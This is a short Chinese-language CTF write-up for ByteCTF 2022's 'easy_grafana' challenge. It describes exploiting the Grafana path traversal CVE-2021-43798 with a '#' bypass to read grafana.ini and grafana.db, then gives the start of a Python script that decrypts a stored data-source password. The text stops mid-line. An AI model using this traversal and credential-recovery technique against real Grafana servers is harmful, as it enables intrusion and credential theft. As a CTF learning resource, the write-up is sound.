ByteCTF 2022 WriteUp
感觉可以抽个时间专门再学学SQL注入了… Web easy_grafana 打开题目,Grafana v8.2.6,经典CVE-2021-43798,但是原始的POC没法用,返回400,后来查了一下发现可能是中间件对URL做了标准化导致没法打,在POC中添加#可以顺利绕过。 读取配置文件/etc/grafana/grafana.ini,发现SecretKey: secret_key = SW2YcwTIb9zpO1hoPsMm 然后就是脱裤/var/lib/grafana/grafana.db,在data_source表中的secure_json_data列中找到加密后的登录密码: {"password":"b0NXeVJoSXKPoSYIWt8i/GfPreRT03fO6gbMhzkPefodqe1nvGpdSROTvfHK1I3kzZy9SQnuVy9c3lVkvbyJcqRwNT6/"} 随便Github找了个脚本解密即可: import base64 from hashlib import pbkdf2_hmac from Crypto.Cipher import AES saltLength = 8 aesCfb = "aes-cfb" aesGcm = "aes-gcm" encryptionAlgorithmDelimiter = '*' nonceByteSize = 12 def decrypt(payload, secret): alg, payload, err = deriveEncryptionAlgorithm(payload) if err is not None: return None, err if len(payload) < saltLength: return None, "Unable to compute salt" salt = payload[:saltLength] key, err = encryptionKeyToBytes(secret, salt) if err is not None: return None, err if alg == aesCfb: return decryptCFB(payload, key) elif alg == aesGcm: return decryptGCM(payload, key) return None, None def encryptionKeyToBytes(secret, salt): return pbkdf2_hmac("sha256", secret....